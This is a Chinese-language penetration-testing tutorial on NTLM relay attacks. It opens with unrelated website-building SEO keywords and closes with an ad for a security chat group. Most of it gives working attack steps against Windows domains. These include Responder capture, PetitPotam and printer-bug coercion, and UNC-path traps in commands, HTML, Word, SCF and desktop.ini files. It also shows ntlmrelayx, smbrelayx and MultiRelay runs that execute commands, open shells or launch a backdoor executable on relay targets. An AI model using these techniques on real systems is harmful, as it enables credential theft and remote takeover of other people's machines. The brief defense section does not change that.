微信app网站建设,手机网站合同,深圳欧啦啦网站建设,网站建设的功能描述0x01 初识NTLM协议
基本概念#xff1a;NTLM(NT LAN Manager)认证是一种早期的Windows网络身份认证协议。它在Windows系统中用于验证用户的身份#xff0c;并提供对网络资源的访问控制#xff0c;它是一种基于Challenge/Response的认证机制。
认证流程
NTLM协议Challenge…0x01 初识NTLM协议
基本概念NTLM(NT LAN Manager)认证是一种早期的Windows网络身份认证协议。它在Windows系统中用于验证用户的身份并提供对网络资源的访问控制它是一种基于Challenge/Response的认证机制。
认证流程
NTLM协议Challenge/Response认证机制
1.协商双方先确定一下传输协议的版本等各种信息
2.质询这一步是挑战/响应的关键一步
3.验证对质询的最后一个结果进行验证验证通过之后即允许访问资源
NTLM协议Challenge/Response认证流程 首先client会向server发起请求连接协商一些相关东西 server就会在本地生成一个16位或8位随机字符即Challenge,并将Challenge传给client 当client接收到Challenge时将username的NTLM-hash对Challenge进行加密加密过程中会利用到用户名、域名、机器名等相关信息生成Response并将Response发送给server server在收到Response后将其和相同的方式进行加密生成另一个Response,如果相同则验证成功如果不同就失败
Challenge和Response分析
Challengeclient向server发起协商后server会随机产生一个Challenge值给client它是无法预估的每一次值都不会一样
ResponseresponseNTProofStrblob
NTProofStr将NTLM-V2-HASH(key)和(challengeblob)两个进行HMAC-MD5加密
NTLM-V2-HASH大写的用户名域名编码成Unicode格式和用户密码的hash值(key)两个进行HMAC-MD5加密
blob是由时间目标信息随机填充字符生成
因此在我们平时使用工具进行攻击的时候抓到的都是Net-NTML-Hash的数据
Net-NTML-Hashusername:domain:challenge:NTProofStr:blob
0x02 NTLM Relay介绍
中继原理
如下图所示在认证的整个流程中攻击者充当一个中间人此时在客户端的眼中他就是服务端而在服务端的眼中他又是客户端。通过这种方式攻击者就可以伪造客户端来完成身份验证而在服务端看来一直只有攻击者在跟他交互所以全程就会把攻击者认为是客户端这样攻击者就达到了伪造客户端的目的。 中继步骤 获得受害者Net-NTLM Hash 使用Net-NTLM Hash进行重放攻击
注因为Net-NTLM Hash不能直接发送给电脑必须要有一个应用层协议来进行封装如SMB、HTTP、RPC、LDAP但是能不能中继到该协议还需要看一下该协议是否有漏洞是否支持等等
0x03 捕获Net-NTLM Hash
捕获NET-NTLM的方式有很多捕获阶段分为两步
1.在B电脑上发起监听
2.A电脑发送认证信息 利用打印机漏洞
kali开启监听
responder -I 监听网卡名 -wd Windows的MS-RPRN协议用于打印客户端和服务器之前的通信默认情况下是启用的。该协议定义的RpcRemoteFindFirstPrinterChangeNotificationEx()方法调用会创建一个远程更改通知对象该对象对打印机对象的更改进行监视并将更改通知发送到客户端。任何经过身份验证的域成员都可以连接到远程服务器的打印服务spoolsv.exe,并请求对一个新的打印作业进行更新令其将该通知发送给指定目标之后它将立即测试该连接即向指定目标进行身份验证。
python3 printerbug.py 域名/账号:密码目标ip kali_ip 回到刚才监听的窗口发现以经捕获到Net-NTLM Hash 利用PetitPotam漏洞
该漏洞利用了微软加密文件系统远程协议MS-EFSRPC, MS-EFSRPC用于对远程协议存储和通过网络访问的数据执行维护和管理操作。利用PetitPotam安全研究院可以通过连接到LSARPC强制触发目标机器向指定的远程服务器发送Net-NTLM Hash
python3 PetitPotam.py -d abc.com -u anna -p admin!#45192.168.24.66 -pipe all listener 192.168.24.25 利用LLMNRNBNS攻击
我们知道在电脑的认证机制中默认是以当前账号密码进行认证所以该攻击方式的原理就是当用户任意输入一个不存在的名称本地hosts文件和DNS服务器均不能正常解析该名称于是系统就会发送LLMNR/NBNS数据包请求解析。攻击者收到请求后告诉客户端自己是不存在的名称要求客户端发送给Net-NTLM Hash进行认证这样攻击者就可以收到客户端发来的Net-NTLM Hash。 利用系统命令
通过执行系统命令访问指定的UNC路径也可以获取到目标机器的Net-NTLM Hash,能够触发Net-NTLM Hash的常见命令如下
net.exe use \hostshareattrib.exe \hostsharecacls.exe \hostsharecertreq.exe \hostsharecertutil.exe \hostsharecipher.exe \hostshareClipUp.exe -l \hostsharecmdl32.exe \hostshare等等网上还有很多可自行查阅
利用钓鱼网页
在网页中嵌入一段js脚本来触发NTLM认证,可配合XSS、文件上传、XXE
!DOCTYPE htmlhtml langenhead meta charsetUTF-8/headbody/body script src\\192.168.24.50\test/script/html
利用office文档
msf创建
msfconsoleuse auxiliary/docx/word_unc_injectorset lhost iprun
将生成的文档放到目标主机上执行这里之前已经抓过了所以就是下图所看到的回显 手动创建
先创建一个word文件然后再文档里面放一个图片退出保存使用7z打开找到document.xml.rels文件将图片路径改为
Target\\192.168.24.55\test TargetModeExternal 这里我使用的word文件不知道是不是版本
利用系统图标
每个文件夹内都会有一个隐藏文件desktop.ini用来指定和存储文件夹图标默认是不可见的只需要在控制面板中去掉“隐藏受保护的操作系统文件”即可 然后新建一个文件夹每个文件夹下面都有如果没有的话就修改图标路径即可将图标路径改为一个存在的主机ip 再去访问该文件 利用SCF文件
SCF文件是“Windows资源管理器命令”文件scf文件时包含了lconFile属性所以Explore.exe会尝试获取文件的图标而lconFile属性是支持UNC路径的所以我们也可以通过这里的lconFile属性来捕获Net-NTLM Hash
利用PDF文件
当用户使用PDF阅读器打开一份恶意的PDF文档该PDF会向远程SMB服务器发出请求如果该远程SMB服务器对数据包进行抓取就能够获得用户Windows系统的Net NTLM Hash通过进一步破解就有可能获得用户系统的明文密码。 利用用户头像
在更改用户头像时如果普通用户验证图片通过那么system用户就会去访问192.168.24.102并且携带用户凭据就可以捕获Net-NTLM Hash 0x04 NTLM Relay利用
自从 MS08-068 漏洞修复之后无法再将 Net-NTLM 哈希值传回到发起请求的机器上除非进行跨协议转发但是该哈希值仍然可以通过中继转发给另外一台机器。利用Responder结合其他中继工具可以进行自动化的拦截并且对哈希值进行中继转发。唯一的一个不足之处就是在这之前需要在进行转发操作的机器上禁用SMB签名。但是除了个别的例外所有的Windows操作系统都默认关闭了 SMB签名。
简单说就是A登陆了administrator这个账户我们通过手段拿到A的Net-NTLM Hash后无法直接把这个Hash传递回A但是如果域内的B也可以通过administrator这个账户登录那我们可以把从A处获得的Hash传递给B拿到B处的administrator权限
MultiRelay.py
修改Responder的配置文件关闭SMB和HTTP kali自带multiRelay.py 文件路径/usr/share/responder/tools
vim /usr/share/responder/Responder.conf python3 MultiRelay.py -t 192.168.24.102 -u ALL 然后在被控主机上使用错误的UNC就能够触发smb从而获得目标主机的shell
ntlmrelayx.py
impacket文件下载https://github.com/CoreSecurity/impacket.git
./ntlmrelayx.py -t 192.168.24.102 -c ipconfig -smb2support
然后在被控主机上触发smb 回到kali中得到ipconfig结果 如果要得到交互式shell,在-c后面接上powershell即可
smbrelayx.py
./smbrelayx.py -h 192.168.24.102 -c whoami
同样在被控主机上触发smb 如果要得到交互式shell,利用CS或msf生成后门文件并开启监听
./smbrelayx.py -h 192.168.24.101 -e /home/gxy/桌面/shell.exe
同样在被控主机上触发smb此时cs或者msf即可得到shell
0x05 NTLM Relay防御 在所有网络节点上使用SMB签名 禁用 NBNS 和 LLMNR 协议 定期更新系统
如果您对免杀对抗内网渗透感兴趣想要深入探讨、交流并学习更多相关内容欢迎各位师傅加入官方技术交流群!!!扫描下方二维码关注公众号【赤鸢安全】回复【加群】添加管理员微信拉您进群
